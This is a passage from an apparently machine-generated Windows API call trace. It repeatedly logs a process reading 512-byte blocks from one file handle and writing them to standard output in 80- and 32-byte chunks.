returned 1 [0132.258] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.258] GetFileType (hFile=0x50) returned 0x1 [0132.258] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.258] WriteFile (in: hFile=0x50, lpBuffer=0x2ced84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced84*, lpNumberOfBytesWritten=0x2cdd88*=0x20, lpOverlapped=0x0) returned 1 [0132.258] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.258] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdd74 | out: lpNewFilePointer=0x0) returned 1 [0132.258] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.258] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.258] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.258] GetFileType (hFile=0x50) returned 0x1 [0132.258] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.258] GetFileType (hFile=0x50) returned 0x1 [0132.258] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.258] WriteFile (in: hFile=0x50, lpBuffer=0x2ceba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.258] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.258] GetFileType (hFile=0x50) returned 0x1 [0132.258] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.258] WriteFile (in: hFile=0x50, lpBuffer=0x2cebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cebf4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.258] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.258] GetFileType (hFile=0x50) returned 0x1 [0132.258] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.258] WriteFile (in: hFile=0x50, lpBuffer=0x2cec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec44*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.258] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.258] GetFileType (hFile=0x50) returned 0x1 [0132.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.259] WriteFile (in: hFile=0x50, lpBuffer=0x2cec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec94*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.259] GetFileType (hFile=0x50) returned 0x1 [0132.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.259] WriteFile (in: hFile=0x50, lpBuffer=0x2cece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cece4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.259] GetFileType (hFile=0x50) returned 0x1 [0132.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.259] WriteFile (in: hFile=0x50, lpBuffer=0x2ced34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced34*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.259] GetFileType (hFile=0x50) returned 0x1 [0132.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.259] WriteFile (in: hFile=0x50, lpBuffer=0x2ced84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced84*, lpNumberOfBytesWritten=0x2cdd88*=0x20, lpOverlapped=0x0) returned 1 [0132.259] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.259] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdd74 | out: lpNewFilePointer=0x0) returned 1 [0132.259] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.259] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.259] GetFileType (hFile=0x50) returned 0x1 [0132.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.259] GetFileType (hFile=0x50) returned 0x1 [0132.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.259] WriteFile (in: hFile=0x50, lpBuffer=0x2ceba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.259] GetFileType (hFile=0x50) returned 0x1 [0132.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.259] WriteFile (in: hFile=0x50, lpBuffer=0x2cebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cebf4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.259] GetFileType (hFile=0x50) returned 0x1 [0132.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.259] WriteFile (in: hFile=0x50, lpBuffer=0x2cec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec44*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.259] GetFileType (hFile=0x50) returned 0x1 [0132.260] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.260] WriteFile (in: hFile=0x50, lpBuffer=0x2cec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec94*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.260] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.260] GetFileType (hFile=0x50) returned 0x1 [0132.260] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.260] WriteFile (in: hFile=0x50, lpBuffer=0x2cece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cece4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.260] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.260] GetFileType (hFile=0x50) returned 0x1 [0132.260] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.260] WriteFile (in: hFile=0x50, lpBuffer=0x2ced34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced34*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.260] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.260] GetFileType (hFile=0x50) returned 0x1 [0132.260] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.260] WriteFile (in: hFile=0x50, lpBuffer=0x2ced84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced84*, lpNumberOfBytesWritten=0x2cdd88*=0x20, lpOverlapped=0x0) returned 1 [0132.260] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.260] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdd74 | out: lpNewFilePointer=0x0) returned 1 [0132.260] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.260] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.260] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.260] GetFileType (hFile=0x50) returned 0x1 [0132.260] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.260] GetFileType (hFile=0x50) returned 0x1 [0132.260] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.260] WriteFile (in: hFile=0x50, lpBuffer=0x2ceba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.260] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.260] GetFileType (hFile=0x50) returned 0x1 [0132.260] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.260] WriteFile (in: hFile=0x50, lpBuffer=0x2cebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cebf4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.260] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.260] GetFileType (hFile=0x50) returned 0x1 [0132.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.261] WriteFile (in: hFile=0x50, lpBuffer=0x2cec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec44*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.261] GetFileType (hFile=0x50) returned 0x1 [0132.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.261] WriteFile (in: hFile=0x50, lpBuffer=0x2cec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec94*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.261] GetFileType (hFile=0x50) returned 0x1 [0132.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.261] WriteFile (in: hFile=0x50, lpBuffer=0x2cece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cece4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.261] GetFileType (hFile=0x50) returned 0x1 [0132.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.261] WriteFile (in: hFile=0x50, lpBuffer=0x2ced34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced34*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.261] GetFileType (hFile=0x50) returned 0x1 [0132.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.261] WriteFile (in: hFile=0x50, lpBuffer=0x2ced84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced84*, lpNumberOfBytesWritten=0x2cdd88*=0x20, lpOverlapped=0x0) returned 1 [0132.261] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.261] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdd74 | out: lpNewFilePointer=0x0) returned 1 [0132.261] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.261] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.261] GetFileType (hFile=0x50) returned 0x1 [0132.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.261] GetFileType (hFile=0x50) returned 0x1 [0132.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.261] WriteFile (in: hFile=0x50, lpBuffer=0x2ceba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.261] GetFileType (hFile=0x50) returned 0x1 [0132.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.261] WriteFile (in: hFile=0x50, lpBuffer=0x2cebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cebf4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.261] GetFileType (hFile=0x50) returned 0x1 [0132.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.262] WriteFile (in: hFile=0x50, lpBuffer=0x2cec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec44*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.262] GetFileType (hFile=0x50) returned 0x1 [0132.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.262] WriteFile (in: hFile=0x50, lpBuffer=0x2cec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec94*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.262] GetFileType (hFile=0x50) returned 0x1 [0132.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.262] WriteFile (in: hFile=0x50, lpBuffer=0x2cece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cece4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.262] GetFileType (hFile=0x50) returned 0x1 [0132.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.262] WriteFile (in: hFile=0x50, lpBuffer=0x2ced34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced34*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.262] GetFileType (hFile=0x50) returned 0x1 [0132.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.262] WriteFile (in: hFile=0x50, lpBuffer=0x2ced84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced84*, lpNumberOfBytesWritten=0x2cdd88*=0x20, lpOverlapped=0x0) returned 1 [0132.262] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.262] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdd74 | out: lpNewFilePointer=0x0) returned 1 [0132.262] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.262] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.262] GetFileType (hFile=0x50) returned 0x1 [0132.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.262] GetFileType (hFile=0x50) returned 0x1 [0132.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.262] WriteFile (in: hFile=0x50, lpBuffer=0x2ceba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.262] GetFileType (hFile=0x50) returned 0x1 [0132.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.262] WriteFile (in: hFile=0x50, lpBuffer=0x2cebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cebf4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.262] GetFileType (hFile=0x50) returned 0x1 [0132.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.263] WriteFile (in: hFile=0x50, lpBuffer=0x2cec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec44*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.263] GetFileType (hFile=0x50) returned 0x1 [0132.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.263] WriteFile (in: hFile=0x50, lpBuffer=0x2cec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec94*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.263] GetFileType (hFile=0x50) returned 0x1 [0132.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.263] WriteFile (in: hFile=0x50, lpBuffer=0x2cece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cece4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.263] GetFileType (hFile=0x50) returned 0x1 [0132.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.263] WriteFile (in: hFile=0x50, lpBuffer=0x2ced34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced34*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.263] GetFileType (hFile=0x50) returned 0x1 [0132.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.263] WriteFile (in: hFile=0x50, lpBuffer=0x2ced84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced84*, lpNumberOfBytesWritten=0x2cdd88*=0x20, lpOverlapped=0x0) returned 1 [0132.263] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.263] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdd74 | out: lpNewFilePointer=0x0) returned 1 [0132.263] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.263] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.263] GetFileType (hFile=0x50) returned 0x1 [0132.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.263] GetFileType (hFile=0x50) returned 0x1 [0132.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.263] WriteFile (in: hFile=0x50, lpBuffer=0x2ceba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.263] GetFileType (hFile=0x50) returned 0x1 [0132.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.263] WriteFile (in: hFile=0x50, lpBuffer=0x2cebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cebf4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.263] GetFileType (hFile=0x50) returned 0x1 [0132.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.264] WriteFile (in: hFile=0x50, lpBuffer=0x2cec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec44*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.264] GetFileType (hFile=0x50) returned 0x1 [0132.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.264] WriteFile (in: hFile=0x50, lpBuffer=0x2cec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec94*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.264] GetFileType (hFile=0x50) returned 0x1 [0132.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.264] WriteFile (in: hFile=0x50, lpBuffer=0x2cece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cece4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.264] GetFileType (hFile=0x50) returned 0x1 [0132.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.264] WriteFile (in: hFile=0x50, lpBuffer=0x2ced34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced34*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.264] GetFileType (hFile=0x50) returned 0x1 [0132.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.264] WriteFile (in: hFile=0x50, lpBuffer=0x2ced84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced84*, lpNumberOfBytesWritten=0x2cdd88*=0x20, lpOverlapped=0x0) returned 1 [0132.264] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.264] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdd74 | out: lpNewFilePointer=0x0) returned 1 [0132.264] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.264] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.264] GetFileType (hFile=0x50) returned 0x1 [0132.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.264] GetFileType (hFile=0x50) returned 0x1 [0132.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.264] WriteFile (in: hFile=0x50, lpBuffer=0x2ceba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.264] GetFileType (hFile=0x50) returned 0x1 [0132.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.264] WriteFile (in: hFile=0x50, lpBuffer=0x2cebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cebf4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.265] GetFileType (hFile=0x50) returned 0x1 [0132.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.265] WriteFile (in: hFile=0x50, lpBuffer=0x2cec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec44*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.265] GetFileType (hFile=0x50) returned 0x1 [0132.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.265] WriteFile (in: hFile=0x50, lpBuffer=0x2cec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cec94*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.265] GetFileType (hFile=0x50) returned 0x1 [0132.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.265] WriteFile (in: hFile=0x50, lpBuffer=0x2cece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2cece4*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.265] GetFileType (hFile=0x50) returned 0x1 [0132.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.265] WriteFile (in: hFile=0x50, lpBuffer=0x2ced34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced34*, lpNumberOfBytesWritten=0x2cdd88*=0x50, lpOverlapped=0x0) returned 1 [0132.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.265] GetFileType (hFile=0x50) returned 0x1 [0132.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.265] WriteFile (in: hFile=0x50, lpBuffer=0x2ced84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdd88, lpOverlapped=0x0 | out: lpBuffer=0x2ced84*, lpNumberOfBytesWritten=0x2cdd88*=0x20, lpOverlapped=0x0) returned 1 [0132.265] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.265] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdd74 | out: lpNewFilePointer=0x0) returned 1 [0132.265] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.265] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.265] GetFileType (hFile=0x50) returned 0x1 [0132.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.265] GetFileType (hFile=0x50) returned 0x1 [0132.265] _get_osfhandle 